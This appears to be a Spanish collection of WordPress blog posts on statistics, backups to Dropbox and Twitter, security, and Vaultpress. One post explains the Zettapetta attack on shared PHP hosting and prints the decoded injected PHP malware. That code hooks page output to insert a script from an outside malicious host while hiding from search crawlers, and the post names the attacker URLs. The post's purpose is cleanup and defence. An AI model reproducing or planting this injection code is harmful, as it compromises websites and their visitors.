2.400 blu ray de doble cara para almacenar un año de la comunidad WordPress

Si quisieras almacenar todas las publicaciones creadas en un solo año por la comunidad WordPress necesitarías 2.375 discos blu ray de doble capa, ahí es nada.

Este es uno de los datos que han recopilado en Broadband Choices y han incluido en una interesantísima infografía en la que, entre otros, se pueden leer estos también interesantes datos:

  • El 48% de las webs usan aún Flash
  • XHTML ya se usa más (65%) que HTML (36%)
  • El 28% de las webs tiene errores (404 o 503)
  • Solo el 2,63% de las webs usa HTML5
  • Google Analytics es la herramienta de medición  más popular (58%)
  • El 62% de Internet se aloja bajo Apache
  • Hay casi 165 millones de blogs
  • Para hacer backup de las entradas publicadas en un solo año por la comunidad WordPress harían falta 2.375 discos blu ray de doble capa
  • Aún el 46,9% de los usuarios usan Internet Explorer en alguna de sus versiones, el 30,8% usan Firefox y Chrome ya lo usan el 14,9% de los navegantes.

El resto de los datos en esta bonita infografía sobre ¿De qué están hechas las webs?


Contenido exclusivo para suscriptores al Feed

¡Gracias por seguirnos a diario!. Premiamos tu fidelidad ofreciéndote habitualmente contenidos exclusivos. Hoy puedes descargar:

Clic aquí para iniciar la descarga Guía Domina tu Blog

WordPress se actualizará en segundo plano, como Chrome

En una entrevista realizada a Matt Mullenweg en la WordCamp Montreal, a preguntas acerca del futuro de WordPress, y en concreto de los planes para la versión WordPress 3.3, Matt dijo que le gustaría que para la próxima versión "mayor" WordPress se actualizara como el navegador Google Chrome, en segundo plano.

Además, también apuntó a que el sistema de carga de archivos necesita mejoras (con lo que estoy totalmente de acuerdo) y que se trabajaría en este sentido, pero sin dar detalles al respecto. Esto, que es una reclamación ya veterana, estaría muy bien verlo pronto, de manera que se adaptara, por ejemplo, a los servicios en la nube, algo que actualmente cada vez más usamos los usuarios pero que aún ningún CMS soporta nativamente.

Nada que alegar a las mejoras en el cargador de medios pero al respecto de las actualizaciones en segundo plano tengo que decir que podría ser interesante siempre y cuando puedas definir que se actualizará automáticamente y que no, para evitar que pierdas personalizaciones o plugins incompatibles al actualizarse y cosas así.

Yo, para variar, pondría alguna cosa más en la lista, a saber … 

  • Mejoras en la gestión de la cache
  • Sistema de backup integrado
  • Sistema de SEO integrado
  • Mejor uso de la base de datos, limitando las tablas y tamaño de las mismas que los plugins puedan hacer
  • Galerías múltiples
  • Editor de portada y funciones para los temas, de modo que se pueda gestionar completamente como un CMS
  • … ¿y tu?

WordPress hackeado en menos de 2 minutos

WordPress hackeado

¿A que asusta el titular?, pues lo peor es que es absolutamente cierto, y sino mira este vídeo para pegar un salto de la silla y comprobar que, con las herramientas adecuadas, cualquiera puede acceder a tu WordPress, extraer los usuarios registrados y, uno a uno, ir extrayendo las contraseñas en un ataque de fuerza bruta … 

¿A que acojona?

Si no quieres que te pase algo así ya sabes … 

  1. Contrata un buen proveedor de hosting especializado en WordPress
  2. Asegura la instalación de WordPress
  3. Mantén actualizado WordPress
  4. Haz copia de seguridad de WordPress, incluso en Dropbox
  5. Usa algún buen plugin de seguridad para WordPress
  6. Limita los intentos de acceso
  7. Contrata Vaultpress
  8. Aplica todas las medidas de seguridad en WordPress que conozcas

Avisado quedas de que no hay nada vulnerable - por si no lo sabías ya - y de que mantener WordPress al día, informándote de las actualizaciones de seguridad, es importante, sobre todo para sitios que afecten a tu negocio o al de un cliente.

Me hizo pasar un mal rato encontrar esto en HowToSpotter

Contenido exclusivo para suscriptores al Feed

¡Gracias por seguirnos a diario!. Premiamos tu fidelidad ofreciéndote habitualmente contenidos exclusivos. Hoy puedes descargar:

Clic aquí para iniciar la descarga Guía para Administrar WordPress

Backup de WordPress en Dropbox

Si eres, como yo, una apasionado del servicio Dropbox de alojamiento en la nube de archivos seguro que te encantará esta entrada.

Y es que ¿para qué quieres tanto espacio si no puedes aprovecharlo para algo realmente útil?. Yo uso Dropbox para muchas cosas útiles, como documentos compartidos de la empresa, sincronización de ficheros entre el Mac y el iPad, pero no sabía que había algo para hacer copia de seguridad de WordPress en Dropbox.

Y lo hay, es un plugin, así de fácil. Solo tienes que instalar WordPress backup to Dropbox, eliges la carpeta que quieres salvaguardar y el nombre de la carpeta en Dropbox donde se almacenará, programas cada cuanto quieres que se haga la copia de segurida y ya está. Antes, deberás autorizar al plugin a acceder a tu cuenta de Dropbox, claro.

Si aún no usas Dropbox puedes registrarte en este enlace, de paso me regalas unos cuantos megas para seguir haciendo copias de seguridad y esas cosas.

Contenido exclusivo para suscriptores al Feed

¡Gracias por seguirnos a diario!. Premiamos tu fidelidad ofreciéndote habitualmente contenidos exclusivos. Hoy puedes descargar:

Clic aquí para iniciar la descarga Guía para Administrar WordPress

Dropbox y WordPress

A nadie que me conozca le sorprenderá que hable maravillas de Dropbox, ese servicio que permite sincronizar y compartir archivos en la red. Ha mejorado tanto últimamente que cada vez me cuesta más guardar archivos en local, justificar no ponerlos directamente en mi Dropbox.

Pues bien, ahora dos de mis amores, DropBox y WordPress, unen fuerzas mediante varios plugins, vamos a verlos:

  • Dropbox upload form: La idea del plugin es sencilla, ofrecer un formulario mediante el cual tus lectores puedan subir archivos a la cuenta de Dropbox previamente definida.

    En sitios colaborativos, de grupos de trabajo, es un modo estupendo y sencillo de integrar ambas maravillosas herramientas.

    Una vez instalado y configurado el plugin solo tienes que insertar en la página o entrada que desees el siguiente shortcode:

    HTML:
    1. [wp-dropbox]

  • Dropbox sync: Mediante este plugin puedes sincronizar las imágenes de tu WordPress, de manera que se suban a tu Dropbox y se carguen desde ahí, reduciendo la carga de tu sitio, además de disponer de una copia de seguridad de las mismas.

Por último, una idea estupenda es usar tu Dropbox como sistema de backup de WordPress. Para ello puedes seguir este tutorial. Dropbox no solo te ofrece un buen montón de espacio para salvaguardar tu WordPress sino que su sistema de control de versiones te permitirá almacenar el histórico de cambios en tu tema y sistema de ficheros de la instalación de WordPress.

Por cierto, si te vas a registrar en DropBox te dará lo mismo hacerlo desde este enlace y así, de paso, me dan unos megas más para mi cuenta. ¡Gracias!

Contenido exclusivo para suscriptores al Feed

¡Gracias por seguirnos a diario!. Premiamos tu fidelidad ofreciéndote habitualmente contenidos exclusivos. Hoy puedes descargar:

Clic aquí para iniciar la descarga Guía Domina tu Blog

Copia de seguridad de Twitter en WordPress

Twitter es uno de los medios sociales emergentes que más posibilidades ofrecen cada día, aún es limitado el número de usuarios que lo utilizan pero poco a poco va mostrando sus virtudes a más y más usuarios.

Ahora bien, Twitter tiene algunas carencias que sus usuarios "perdonamos", quizás porque somos aún pocos los que lo usamos (pero crece a pasos agigantados) o porque tampoco la mayoría lo usamos para asuntos vitales. Otro caso, por supuesto, es el de las agencias de márketing que usan Twitter como herramienta de comunicación y atracción de tráfico e interés en sus campañas de promoción, ahí los problemas de Twitter si que son un problema importante.

Y es que Twitter ha tenido ya varios problemas graves de seguridad a pesar de la juventud del servicio y las caídas del sistema son casi ya motivo de mofa por parte de los usuarios, como si fuera otro Windows, al que todos consentimos los errores.

Por otro lado, si lo usas, puede convertirse en una gran herramienta de comunicación, donde compartes tu vida en cierta medida. Esto es motivo suficiente para plantearse algún modo de hacer copia de seguridad de Twitter, y ¿qué mejor que hacerlo con WordPress?.

Para ello no conozco nada mejor que Tweet Archiver, un plugin que, una vez instalado, importa todos tus tweets (con la limitación de Twitter de 3.200) y, en adelante, puedes programarlo para que siga importando en intervalos regulares que tu mismo defines, y ahí ya no hay límites. Ya lo uses en tu blog actual (algo que creo sería redundante) o en una instalación nueva de WordPress, dedicada a esta función, es un modo fantástico de tener todos tus tweets a mano porque …

  • Te ofrece un modo sencillo, que ya conoces bien, de buscar en tus tweets
  • No tiene la limitación de Twitter de no poder revisar más allá de 3.200 tweets (no salva esa carencia si ya tenías más antes de hacer la primera importación pero no perderás ninguno más)
  • Puedes, para mayor seguridad, hacer backup de esta instalación de WordPress en cualquier momento
  • Nombres de usuario de Twitter con enlace
  • Hashtags enlazados
  • Hashtags como tags

¿Necesitas más razones para montar una copia de seguridad de tu Twitter con Tweet Archiver?, ya estás tardando. Yo ya lo he instalado en mi backup de Twitter y es una gozada.

Copia de seguridad de tu Twitter en XML


TwitterBackup es una utilidad para guardar una copia de seguridad de los contenidos de tu cuenta Twitter, de forma que puedes conseguir todos tus mensajes en formato XML para guardarlo tu y que no sea la gente de Twitter la que pueda decidir borrar o no almacenarlo, aunque no creo que sea el caso.

TwitterBackup 3.0.2 470x293 Copia de seguridad de tu Twitter en XML

Esta aplicación ha sido desarrollada en Java y como código fuente libre, por lo que podéis modificarla y ejecutarla en cualquier plataforma donde tengáis Java instalado. Es importante destacar que para descargar la copia de tus Tweets tienes que facilitar el usuario y contraseña de tu cuenta.

El código fuente está disponible en johannburkard.de y para ejecutarlo desde consola solo tenéis que poner java -jar twitterbackup-3-0-2.jar. No me ha gustado que la contraseña es visible cuando la tecleas.

Si te parece complicado utilizar una herramienta así también existen soluciones online para realizar backup de nuestra cuenta twitter como por ejemplo: Tweet Backup, Backup My Tweets, Mktwitter (gratis y para Windows), tweetbook (copia en PDF), Tweetake, mytwebo (copia en PDF), …

Sitio Oficial: TwitterBackup | Descargar ejecutable java.
Vía: makeuseof y wwwhat’s new

Original Post / Entrada Original: Carrero.es. Si quieres Juegos Gratis disfruta aquí o decora tu casa.

Copia de seguridad de tu Twitter en XML

Zettapetta: Nuevo ataque a servidores compartidos

Desde hace unos días hay nuevas noticias de ataques a sitios que estén basados en PHP, como lo está WordPress, y hoy ya puedo dar indicaciones algo claras al respecto, perdonad el retraso no obstante.

Lo primero a aclarar es que no es un ataque masivo a WordPress, sino que esta inyección de código afecta a cualquier web basada en PHP y, a día de hoy, el otro dato relevante es que además compartan servidor, no está pasando en servidores dedicados. De hecho, si fuera un ataque masivo a WordPress habría muchos más sitios infectados, dado la enorme implantación que a día de hoy (gracias a vosotros) tiene este CMS.

Esto nos hace pensar en dos posibles causas, una segura. La primera es que el atacante utiliza vulnerabilidades de seguridad del servidor en el que está alojado y que comparte con otros sitios, y la segunda que algo está permitiendo que el código se inyecte en los ficheros PHP de los sitios atacados, ya sea un plugin mal diseñado, una mala configuración de seguridad del CMS utilizado. No obstante yo apuesto por la primera opción porque el Zettapetta este ha infectado sitios estáticos en donde había un par de ficheros PHP sueltos y, como ya he dicho, si fuera algo especial para WordPress estaríamos todos infectados, o casi, y no es así.

Este caso es especialito, porque incluso hay un vídeo en el que el supuesto causante explica como inyectar código en servidores compartidos de Networks Solutions ¡sin tener que robar nombres de usuario y/o contraseñas!

Afortunadamente hay solución.

Los atacantes están infectando las webs con un script que trata de inyectar software malicioso a los sitios "cliente" y, además, evita que los mecánismos anti-malware que incluyen los modernos navegadores como Firefox y Safari puedan detectarlo.

El script afecta a cualquier servidor compartido, y ya se han comprobado ataques en varios proveedores de hosting de primer nivel, como Mediatemple.

En los sitios atacados se insertaba este javascript:

http://www.indesignstudioinfo.com/ls.php

http://zettapetta.com/js.php

Y lo que hace el Zettapetta este de las narices es añadir un montón de código en base64 al principio de todos los ficheros PHP que se encontrara en el servidor, recursivamente. Vamos, que si entra en tu WordPress infecta todos los ficheros 'core', los de los plugins, los temas, todo, hasta el wp-config.php y los index.php habitualmente vacíos.

Una vez descodificado el base64 lo que contiene es esto:

PHP:
  1. if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return base64_decode("<script src="http://indesignstudioinfo.com/ls.php"></script>"); } return ""; } } if(!function_exists('gzdecode')){ function gzdecode(<script src="http://indesignstudioinfo.com/ls.php"></script>){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }

El bicho tiene tela así que a limpiar se ha dicho … 

Lo primero es probar el hack que han elaborado en Securi.net. Descargas este archivo a tu escritorio:
http://sucuri.net/malware/helpers/wordpress-fix_php.txt y lo renombras a wordpress-fix.php

Una vez hecho esto lo subes a tu sitio por FTP y lo ejecutas desde el navegador. O sea: http://miweb.com/wordpress-fix.php

El script tarda unos minutos en completarse ya que escanea todo tu sitio y quita las entradas de malware, recursivamente también.

Cuando termine puedes borrar el archivo y, a continuación, para asegurar que dejas todo limpio, seguir estas indicaciones, las de siempre:

  • Exporta todo tu contenido mediante la utilidad de exportación de WordPress y guarda la carpeta wp-content así como cualquier otra que utilices de modo manual. Revisa tu tema, plugins y carpetas de uploads, etc, antes de darlos por seguros.
  • Revisa el fichero wp-config.php para eliminar cualquier posible inyección de código, cambia los permisos a 644 o, mucho mejor, carga un wp-config.php totalmente limpio.
  • Cambia todas las contraseñas: ftp, base de datos. Usa contraseñas fuertes, usando caracteres alfanuméricos y símbolos
  • Como el problema afecta a la base de datos hay que descartarla. Borra la actual y crea una nueva o, en su defecto, revisa cada una de las tablas
  • Borra todo el contenido de la instalación actual de WordPress (recuerda que antes has hecho backup)
  • Instala un WordPress limpio (última versión), usando la información de la nueva base de datos recién creada
  • Carga tu carpeta wp-content de nuevo, una vez comprobado que todo está limpio
  • Importa los posts de tu sitio que exportaste con la utilidad de importación de WordPress
  • Configura tu WordPress de manera segura siguiendo las instrucciones de los enlaces facilitados

¡Que el backup te acompañe!

Contenido exclusivo para suscriptores al Feed

¡Gracias por seguirnos a diario!. Premiamos tu fidelidad ofreciéndote habitualmente contenidos exclusivos. Hoy puedes descargar:

Clic aquí para iniciar la descarga Guía para Administrar Wordpress

¿Te gustó este post? ¡Compártelo! Bitacoras.com TwitThis Facebook Meneame Google Bookmarks del.icio.us Live Technorati Ping.fm Wikio Turn this article into a PDF! E-mail this story to a friend! Print this article!

Cómo hacer backups en Tumblr, Blogger y WordPress.com

En Weblog Magazine les ofrecemos la última novedad de Tumblr (el backup mediante un programa) y cómo hacer backups también en Blogger y Wordpress.com: Quien tiene un backup tiene un tesoro.

Bonus extra:

En WordPress.org, los backups se pueden realizar con el plugin DB-Backup. En Blogpocket hay abundante información sobre este asunto: ¿Pueden recuperar su blog completo en dos segundos? .

La base de datos de WordPress es conveniente tenerla optimizada: Guía de optimización de WordPress (II).

Si estás interesado en éste u otros asuntos relacionados con WordPress, puedes consultar la categoría específica.

email Bitacoras.com Twitter del.icio.us Facebook Google Bookmarks BarraPunto Meneame Wikio Ping.fm Technorati

También puedes leer Weblog Magazine, mi blog en ABC.es

Y estoy en Twitter, Facebook y Tumblr.

Vaultpress: WordPress seguro garantizado

Vaultpress es un nuevo servicio lanzado por la empresa Automattic, que ofrece backup seguros de sitios WordPress. El sistema, que acaba de ser anunciado ahora mismo, admite peticiones de participar en la fase ßeta, lo que servidor ya ha hecho.

No hay información alguna de como lo hacen, solo se indica que - como conocen WordPress como nadie - asegurarán tu instalación, no solo el contenido, sino tus configuraciones y personalizaciones. En el fondo no es difícil adivinar que harán backup de tu base de datos, con todas sus tablas, y quizás los ficheros de configuración y hasta tu carpeta 'wp-content' (esto son solo elucubraciones mías) y facilitarán algún sistema mediante el cual, dando tu aprobación, accedan a tu servidor MySQL, harán backup de tu base de datos y, en caso de desastre, podrás recuperar tu configuración completa.

Planean cobrar 10$ por blog y mes, pero en la misma petición de beta-tester te piden que les sugieras un precio por el servicio.

¿Te gustó este post? ¡Compártelo! Bitacoras.com TwitThis Facebook Meneame Google Bookmarks del.icio.us Live Technorati Ping.fm Wikio Turn this article into a PDF! E-mail this story to a friend! Print this article!